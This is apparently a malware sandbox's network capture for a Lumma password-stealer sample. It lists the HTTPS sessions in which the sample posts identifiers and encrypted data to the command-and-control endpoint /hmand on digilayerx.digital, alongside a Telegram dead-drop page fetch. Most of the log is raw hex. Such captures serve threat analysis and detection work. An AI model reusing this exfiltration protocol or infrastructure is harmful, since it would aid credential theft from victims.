2025-04-25 06:55:19 UTC	12251	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 56 69 65 77 20 40 77 65 72 6d 6e 6a 67 6b 33 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: View @wermnjgk34</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49690	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:19 UTC	268	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 45 Host: digilayerx.digital
2025-04-25 06:55:19 UTC	45	OUT	Data Raw: 75 69 64 3d 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 26 63 69 64 3d Data Ascii: uid=b0e4cff5dff935d4311b9e024109f783ab8c&cid=
2025-04-25 06:55:20 UTC	244	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:20 GMT Content-Type: application/octet-stream Content-Length: 33581 Connection: close Server: cloudflare Cf-Cache-Status: DYNAMIC CF-RAY: 935bef2609397867-PHX alt-svc: h3=":443"; ma=86400
2025-04-25 06:55:20 UTC	1125	IN	Data Raw: 56 be f7 d2 8c be b6 2d 91 f0 00 6e 10 7b ed fb 5e a1 25 85 27 b2 81 70 78 70 02 af ff 20 c9 d8 02 e0 4a b2 fa 0e 90 35 a7 77 99 61 eb c7 0f 15 bc 10 8c 12 57 d7 1f df 68 ed 2b a0 87 03 45 f9 f3 6c b6 d2 d4 2e df c6 cb 06 ee 00 9d b3 50 6c 0a 08 75 41 72 17 73 b4 14 fa 2f 34 1a 38 4f f4 08 b9 08 ad 85 22 9c 63 0c fc 29 f8 ff 6c 3c 36 69 6b b2 73 1a 39 99 3e fa d1 6f 42 00 01 9f ca 6c b3 ff 09 52 19 e5 96 3c dc e7 c0 fd ef 35 2d 5b 6b 31 f0 90 2b 0e 45 6d 51 02 06 8f bf c8 ba 41 88 ab 52 76 9c d5 4f 3c 3e a6 e6 59 8a f6 23 de 4d b1 bd 75 84 00 17 35 3e 36 b6 7d 79 7b 00 86 6e 6f 7b d4 4f 18 c0 cc 7f f7 ff 87 48 c5 9b 4c 8b 14 c3 12 30 f6 da d6 1e ff 5a 21 01 9a 2b 58 58 d6 c1 13 c9 02 e6 f9 8f 40 ed 20 08 fc 5e c2 3c 23 b6 5d 65 ea 4e 5b 1b ec f9 bc 88 d3 Data Ascii: V-n{^%'pxp J5waWh+El.PluArs/48O"c)l<6iks9>oBlR<5-[k1+EmQARvO<>Y#Mu5>6}y{no{OHL0Z!+XX@ ^<#]eN[
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: 01 f8 18 e3 02 71 f1 b8 50 83 4f 74 36 c5 2f 67 4e a6 95 e6 9c 56 11 b4 61 aa a2 29 95 b1 d8 8e e7 fe 8b 0a 7a 36 cc 77 30 e0 61 ab fe fb 51 ac c7 59 39 1c 89 0a 05 10 91 51 58 2c 6a 9d ad 79 4d 61 34 01 87 f4 10 8d 40 41 87 bd 24 d8 55 53 a6 1a 2d 1d 3e 57 3e 06 20 cc 66 5e 9d 43 62 cd 62 52 24 9c 1a 49 4d 7c b2 57 cd e8 18 51 73 d2 61 33 d2 c5 f9 1f be 02 98 1f 79 14 04 36 76 9f 1c 51 a0 a2 2f cb 07 87 2b d2 8d fd 28 df ca 94 e9 6d 5a 2f 33 33 7e 62 7a ca a3 23 52 a8 88 6f 85 a4 f1 5f 73 e8 98 18 d8 56 b2 7b 97 dd b8 e9 5a 53 9f be 0d 76 8f 72 ba 15 28 e0 d1 9e 1e 0d c4 c2 98 5c 5f 47 1d 08 cc a0 e4 b2 e7 5b 02 9c e2 10 71 40 29 0b f8 56 4c 96 37 a9 34 6a 0d c3 b9 71 90 ae d1 f9 8c 8a 00 f1 45 6a ae ca e2 02 cf 75 ea e8 e4 4a e2 db aa f0 0c 4c 28 7a 6c Data Ascii: qPOt6/gNVa)z6w0aQY9QX,jyMa4@A$US->W> f^CbbR$IM\|WQsa3y6vQ/+(mZ/33~bz#Ro_sV{ZSvr(\_G[q@)VL74jqEjuJL(zl
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: cf 61 ea 05 df 93 e9 7b 2a ec cb 51 05 1c f6 c6 de 4e 98 cb cb 72 ba d6 d1 2f 6d f0 16 6d ee 1b 0d bd e2 f1 84 d2 7e 0f 38 81 7c e4 34 db 01 37 e6 04 df ef 62 0b 76 9b 45 47 1f 22 b7 5b e4 2b 5b f4 e0 ec f4 7e 26 53 5f e1 3b ba 1b de 6a 55 ba 70 f5 f7 36 02 02 f4 86 f8 46 cb b3 28 b2 99 a7 4e 19 4c 07 a0 b4 66 c9 8b de cd 97 f4 6d 3e 47 f1 d6 27 39 dd fc 43 e4 eb 79 c2 41 c3 78 6c b9 4a 48 14 c3 29 fa 0a 98 84 7c 83 e1 54 4d 05 8c fb a6 93 88 7e 7d 4e eb da 41 04 8e b4 92 c7 94 82 9a 6d a8 7c 47 c0 e2 f1 b8 fb 28 69 8e 74 15 31 4c 45 af 0c da cb f3 2c 3d f5 a3 eb d6 3d b7 30 93 af 07 e4 cc c7 3f f7 ae 3b ab e4 8c bc 5c 36 cb c5 04 3a fc 13 f6 29 c7 53 8a f3 23 4c e5 e1 d5 3b 5c 60 e3 9a 32 d2 5e 32 6b 8b 3c 01 25 4a d4 04 a4 c7 b5 1f 51 93 9e 41 d7 e5 16 Data Ascii: a{*QNr/mm~8\|47bvEG"[+[~&S_;jUp6F(NLfm>G'9CyAxlJH)\|TM~}NAm\|G(it1LE,==0?;\6:)S#L;\`2^2k<%JQA
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: a5 02 6b 40 99 51 e8 8c 1b 64 a9 49 07 cf 1b ea d4 28 aa 45 09 52 0a bd 00 66 5a 47 b7 87 14 66 3a b2 f1 c8 b7 8f f3 3f 87 31 95 0b db 22 b2 3c 40 5d bb 50 35 96 31 31 07 66 55 1e 24 68 0c c7 f3 08 c7 d5 17 34 80 97 b0 29 16 16 73 ea ad 67 ce 09 19 0f 0b 93 0e e4 ad 85 64 49 fc 2d 7c 3d 7e ca ba 75 6b 42 50 8f 76 21 dc ac 84 35 d3 d4 55 31 d2 9a 4a 5d 85 7c 3f 0e 76 dc ce bb 16 53 75 f5 05 6c 86 27 9a 9b 1e 1e c9 ba 82 5f 89 bc e6 a2 2a ca ea 8b f2 5c a3 43 6c 9f ef 3e 36 63 d5 7a f2 0a c9 63 d0 9a 8f bc 33 8c 65 90 91 20 13 12 40 94 6a 0f 91 ab c2 59 12 46 a7 80 d4 f8 be a4 f1 49 ab 2e 98 5a 37 d8 63 13 e4 e0 ca c6 fd 19 a4 bf 20 4c 95 8a df 30 fc b0 d2 d3 d5 1d 84 53 91 7f 16 ca 93 f0 5b d9 4d 14 7e 6e 6a 3c 22 3e 9c 38 7c 3a 33 6d 4b 14 b5 ac cc 3e 26 Data Ascii: k@QdI(ERfZGf:?1"<@]P511fU$h4)sgdI-\|=~ukBPv!5U1J]\|?vSul'_*\Cl>6czc3e @jYFI.Z7c L0S[M~nj<">8\|:3mK>&
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: 61 26 b1 dc a9 79 23 af b6 c5 a7 2c a0 7a 55 1e 5c 1b a2 70 f5 0f a6 6a 8c 69 98 fc a3 7f 39 0d ae ab db 71 9a 56 0f 9d 89 9f 50 c1 f8 4a 6e bb 33 d3 67 d3 43 50 d6 8c d0 97 e7 74 5a 1c 8c 95 c3 bc 76 2a 58 b3 58 16 2b e9 0c 15 64 4f d5 7a 8a ed 51 bf 1b 76 c2 04 83 5b a5 f0 50 d2 42 55 90 5f 54 dc a2 e3 10 47 d5 d1 e4 29 21 5e 96 58 c1 4f 3b 7e dc 8f 37 a8 ea d3 5d 94 40 22 1f 0a 21 ba e5 9e e1 5a 9e e6 d8 03 f8 a6 7f bf da ae fe a3 4d da 19 61 a6 cd 67 e0 07 9e 6f 82 05 6f 94 89 59 0e 6e 82 58 db ab fe 19 2d b7 a5 23 52 d9 60 df 9a 4e 5c e1 eb bc 8d 04 1b 35 bc ee 2e 59 b3 bb b2 0e be ed 8c 29 b0 ce 86 99 a0 82 d0 26 e0 05 c3 cf 94 9e f9 25 1b f2 7e fb fb ad 0f b6 65 7b fd 29 b5 f3 05 9d b5 75 42 66 10 d3 e3 77 c1 92 dc 34 f2 45 2a ec 79 ab 24 bf 81 97 Data Ascii: a&y#,zU\pji9qVPJn3gCPtZvXX+dOzQv[PBU_TG)!^XO;~7]@"!ZMagooYnX-#R`N\5.Y)&%~e{)uBfw4Ey$
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: f6 90 56 ae a2 19 27 db de 0f bd 35 1d 8f 3d 98 2d fc 51 65 6b f5 87 b0 0b 20 98 fe 30 4a 3c 8e 26 ed c0 df c7 08 64 d1 cb d0 b9 31 41 de 1c 1f 24 3f ed e3 f5 1a 41 e5 00 14 8d ea b8 23 a7 ae 77 2f d2 c8 6c df cf 08 4b 79 81 4a 12 df b1 91 50 d1 c6 60 e9 c5 1c b3 ce 7a 2b f9 8f 8e e8 a4 d0 34 99 92 ee e5 54 d9 e1 ea 8e 5b 72 90 78 ba 5f fa 3b f4 34 8d eb 0d a9 4b 20 86 31 22 d7 fb 5a ec ec ec 48 e9 95 f7 6c 0d 33 30 25 6f ee f9 6a 6d d8 14 dc 9a 4b 56 5d 8c 59 b7 60 47 47 ad 48 8a 7a 0f 07 e3 f0 d5 0b 93 74 82 ca a4 d3 85 f4 12 fb 82 ab e0 a7 e1 13 44 a0 44 14 46 81 a4 fb a2 79 d8 fe 02 0c 58 2d 78 65 17 8a 88 95 03 50 3d c9 5e dc fc 76 da 36 a0 e2 78 8e 51 06 0e ed 54 ca 13 d5 a0 16 8a a9 1e 3f 0b be d0 bc cc 8c 35 1f aa a9 d3 d8 90 53 9a 7d 43 0c 64 8f Data Ascii: V'5=-Qek 0J<&d1A$?A#w/lKyJP`z+4T[rx_;4K 1"ZHl30%ojmKV]Y`GGHztDDFyX-xeP=^v6xQT?5S}Cd
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: 54 31 0d 17 08 3b 5b cd a4 f3 59 1e 05 68 bd e8 78 ae 3c 74 e1 b9 07 7b c2 23 9d e0 00 22 fb d8 fe f1 61 54 00 c1 34 2c 4e 71 47 33 ce e0 a8 3c 46 7c c0 56 63 b1 ab e2 4a 9b 9f 80 4e 43 ba ed dc 1c 77 df fa 2f 09 5d 9c 54 14 ff c8 db 1e 14 9e 11 20 c4 ec 64 74 2d 04 6e 24 aa d4 6b c9 6b 54 c5 4a 84 f4 30 bb 30 b5 fa 25 0e f9 3b 0a 1a 7d ad 75 0c 5b 11 43 a3 38 ba b6 96 eb 63 46 d1 9a 62 96 e5 31 52 e5 79 c2 aa 48 1c c4 38 3c e1 55 1d 4e 0a 10 9d 42 71 53 4c 99 5c a5 a3 d4 e5 1e c4 26 06 82 9e f9 0f 77 e4 0f e9 c7 98 fc 5b b3 0b a0 60 b2 0b 74 1f 58 fb 7b 3e 15 86 ab 14 68 45 d9 d0 01 78 af 36 69 30 52 5e d9 89 8f 2a 31 e1 7d f2 0d c7 62 ba 60 94 5d 1a b3 32 96 aa 09 6c 71 c9 b0 1e 8d 98 e8 78 c3 f8 33 69 e9 52 42 41 78 1d 4f aa 8f fd eb 4e ca b5 9c c8 65 Data Ascii: T1;[Yhx<t{#"aT4,NqG3<F\|VcJNCw/]T dt-n$kkTJ00%;}u[C8cFb1RyH8<UNBqSL\&w[`tX{>hEx6i0R^*1}b`]2lqx3iRBAxONe
2025-04-25 06:55:20 UTC	1369	IN	Data Raw: e2 a6 c7 93 0b b8 f9 e1 63 2b 7f 69 6b 61 54 00 68 09 27 f9 45 23 0b b6 cf 7c 3f f5 e5 e7 b4 3f 49 32 9a 68 fa 08 b2 70 ef 3d b1 14 48 8c 31 8c 95 d9 1e e8 20 84 ba 3a 27 68 64 9d ae 9d 23 a9 9b 26 63 21 19 2b 44 f1 48 05 e1 4b d9 56 5e 1c fc 11 4c b6 19 0e 2a ec 8f b9 a5 94 76 cb 4e 38 11 d0 a7 7b 08 ab fe 83 22 37 4f 29 9e 19 e5 83 53 af f9 55 82 4a b3 ab de 0a 15 d9 26 c0 65 14 4c 32 66 1a 54 a0 0b de e7 7c 7a 46 3c 07 72 c6 cd 9c 61 36 13 27 c5 ac c1 f8 f1 4d b2 cd f6 89 89 51 59 7d 75 02 d0 7e c8 aa d7 bb e5 d1 a2 08 06 23 e6 10 60 c7 3b 8c ee b1 eb 1b 10 0d 8c 0d 78 1b 30 4c af 40 6f 45 e0 36 01 2d bc a6 c2 0f c9 e5 e2 39 0c ee 21 53 38 b3 c4 dd b8 53 af ac 6c d5 85 dc e3 15 08 b2 6a a0 5a dc 59 03 8f 11 76 51 68 5d dc 23 ed a1 8a 90 82 e9 6c e7 cd Data Ascii: c+ikaTh'E#\|??I2hp=H1 :'hd#&c!+DHKV^L*vN8{"7O)SUJ&eL2fT\|zF<ra6'MQY}u~#`;x0L@oE6-9!S8SljZYvQh]#l
2025-04-25 06:55:20 UTC	459	IN	Data Raw: 4a c8 fb 00 37 3c 16 ff 50 c0 a0 cb a4 30 fc 9b a4 f0 03 c9 32 e6 49 f1 3e f6 34 6d e1 14 23 5f 1f 9b 03 05 91 53 d1 25 b8 d5 6c cb 6d a6 c3 e2 6f db 3d 42 a9 6c 9a 94 39 c2 09 16 4d bb 00 0a f8 7a 1d 6a 7f 8e d5 40 08 25 0b 84 99 93 2b 0b 56 16 1c 7e 21 79 b3 a7 82 26 67 15 bb 1f 35 ca ca 27 04 34 54 96 b7 e8 de 67 74 ff cc 08 d3 7c b5 a5 67 05 db e0 e6 6e 28 31 06 52 ee a5 26 1b c7 f7 fe b4 42 81 b7 9e 60 7d 3c 23 d2 fc bd 82 c8 f7 6a 8c 28 83 31 5f ab ed 38 6c 68 91 96 8b ff a6 28 6b 2a b1 7e 69 6e ae 55 7e 82 f0 d6 ba 71 3b 70 6c 17 42 86 2f d0 82 4d 3a 5d 4d d9 7a 6a 52 7b e1 38 28 ba 2b d3 2f 3e 4f f3 37 da db 23 7f d4 61 69 21 a5 54 a9 ac af 05 14 46 25 14 4e 02 f4 cc 0d f3 fc 26 18 d6 fd 53 a1 f4 d3 41 81 39 d9 4f 1d f2 87 e6 0b 34 dc 80 88 0a ef Data Ascii: J7<P02I>4m#_S%lmo=Bl9Mzj@%+V~!y&g5'4Tgt\|gn(1R&B`}<#j(1_8lh(k*~inU~q;plB/M:]MzjR{8(+/>O7#ai!TF%N&SA9O4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49691	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:21 UTC	280	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MEbMSIjUffSU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 14887 Host: digilayerx.digital
2025-04-25 06:55:21 UTC	14887	OUT	Data Raw: 2d 2d 4d 45 62 4d 53 49 6a 55 66 66 53 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 0d 0a 2d 2d 4d 45 62 4d 53 49 6a 55 66 66 53 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 45 62 4d 53 49 6a 55 66 66 53 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 45 33 35 44 36 33 39 35 41 38 36 38 44 33 44 44 33 30 30 38 46 38 34 44 Data Ascii: --MEbMSIjUffSUContent-Disposition: form-data; name="uid"b0e4cff5dff935d4311b9e024109f783ab8c--MEbMSIjUffSUContent-Disposition: form-data; name="pid"2--MEbMSIjUffSUContent-Disposition: form-data; name="hwid"7C8E35D6395A868D3DD3008F84D
2025-04-25 06:55:22 UTC	264	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:22 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 935bef315f490111-PHX alt-svc: h3=":443"; ma=86400
2025-04-25 06:55:22 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
2025-04-25 06:55:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49695	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:23 UTC	277	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=hQvp09IzS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 15021 Host: digilayerx.digital
2025-04-25 06:55:23 UTC	15021	OUT	Data Raw: 2d 2d 68 51 76 70 30 39 49 7a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 0d 0a 2d 2d 68 51 76 70 30 39 49 7a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 68 51 76 70 30 39 49 7a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 45 33 35 44 36 33 39 35 41 38 36 38 44 33 44 44 33 30 30 38 46 38 34 44 42 33 34 46 41 0d 0a 2d 2d Data Ascii: --hQvp09IzSContent-Disposition: form-data; name="uid"b0e4cff5dff935d4311b9e024109f783ab8c--hQvp09IzSContent-Disposition: form-data; name="pid"2--hQvp09IzSContent-Disposition: form-data; name="hwid"7C8E35D6395A868D3DD3008F84DB34FA--
2025-04-25 06:55:24 UTC	264	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:24 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 935bef3edda8b38d-PHX alt-svc: h3=":443"; ma=86400
2025-04-25 06:55:24 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
2025-04-25 06:55:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49696	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:25 UTC	287	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=19Yr3f4rd19AxSnEItx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 20560 Host: digilayerx.digital
2025-04-25 06:55:25 UTC	15331	OUT	Data Raw: 2d 2d 31 39 59 72 33 66 34 72 64 31 39 41 78 53 6e 45 49 74 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 0d 0a 2d 2d 31 39 59 72 33 66 34 72 64 31 39 41 78 53 6e 45 49 74 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 39 59 72 33 66 34 72 64 31 39 41 78 53 6e 45 49 74 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 45 33 35 Data Ascii: --19Yr3f4rd19AxSnEItxContent-Disposition: form-data; name="uid"b0e4cff5dff935d4311b9e024109f783ab8c--19Yr3f4rd19AxSnEItxContent-Disposition: form-data; name="pid"3--19Yr3f4rd19AxSnEItxContent-Disposition: form-data; name="hwid"7C8E35
2025-04-25 06:55:25 UTC	5229	OUT	Data Raw: 6a ef b9 bd 9e 14 73 f1 e2 bd 96 28 ef 41 34 70 81 4d 9b 34 56 e0 86 d6 f7 d5 3a 28 ac 80 0c 36 90 8a e6 a3 c2 b1 a5 84 6e d5 ee 94 26 46 c6 42 7a e0 a5 2c 0d ae f4 cb 4b 72 ce c0 b6 85 26 56 16 49 0b 1f 17 3d a3 80 fb 3f 3d 02 84 8b aa 77 8a 04 fc 7e f4 f3 a1 3e 5e 17 45 64 46 fe 0c e4 05 3a 59 ad 74 8b 8b 73 36 0c 69 16 77 d6 a7 79 9f 45 c2 7c c5 f6 b1 54 cc ff 72 4e 43 9a ef 28 ca f9 9f e9 d2 0c a0 b3 b2 99 07 c5 09 3b 41 8c 86 c7 bb 58 aa 92 12 6b 3b 27 5d 3a f9 84 14 b2 c4 41 91 0f 48 ed dc 76 4e fe 8f aa 52 49 69 3c 66 08 e2 5a 7b 8d 6a fb db f0 c3 9f d4 ce 9b 7f ec db 0d 0f a4 d0 35 d0 ec 7b 75 95 07 85 5c b1 66 5f 1b cf 4f cc da 6e cb 40 cc 6e 4e 06 3b 7e ee 77 4d b7 bb 18 4d 8e 8d 3d 5b a6 db db 14 d1 5c 44 e2 0c 28 0b e1 13 e8 8d c5 17 01 4e 22 Data Ascii: js(A4pM4V:(6n&FBz,Kr&VI=?=w~>^EdF:Yts6iwyE\|TrNC(;AXk;']:AHvNRIi<fZ{j5{u\f_On@nN;~wMM=[\D(N"
2025-04-25 06:55:26 UTC	264	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:26 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 935bef48fa929d47-PHX alt-svc: h3=":443"; ma=86400
2025-04-25 06:55:26 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
2025-04-25 06:55:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49697	172.67.146.208	443	7972	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-25 06:55:28 UTC	286	OUT	POST /hmand HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GS604I6rSWhdj4xGM5I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 2401 Host: digilayerx.digital
2025-04-25 06:55:28 UTC	2401	OUT	Data Raw: 2d 2d 47 53 36 30 34 49 36 72 53 57 68 64 6a 34 78 47 4d 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 62 30 65 34 63 66 66 35 64 66 66 39 33 35 64 34 33 31 31 62 39 65 30 32 34 31 30 39 66 37 38 33 61 62 38 63 0d 0a 2d 2d 47 53 36 30 34 49 36 72 53 57 68 64 6a 34 78 47 4d 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 53 36 30 34 49 36 72 53 57 68 64 6a 34 78 47 4d 35 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 38 45 33 35 Data Ascii: --GS604I6rSWhdj4xGM5IContent-Disposition: form-data; name="uid"b0e4cff5dff935d4311b9e024109f783ab8c--GS604I6rSWhdj4xGM5IContent-Disposition: form-data; name="pid"1--GS604I6rSWhdj4xGM5IContent-Disposition: form-data; name="hwid"7C8E35
2025-04-25 06:55:28 UTC	264	IN	HTTP/1.1 200 OK Date: Fri, 25 Apr 2025 06:55:28 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Server: cloudflare Vary: Accept-Encoding Cf-Cache-Status: DYNAMIC CF-RAY: 935bef591a2d3778-PHX alt-svc: h3=":443"; ma=86400
2025-04-25 06:55:28 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 37 33 2e 32 34 34 2e 35 36 2e 31 38 36 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 173.244.56.186"}}
2025-04-25 06:55:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

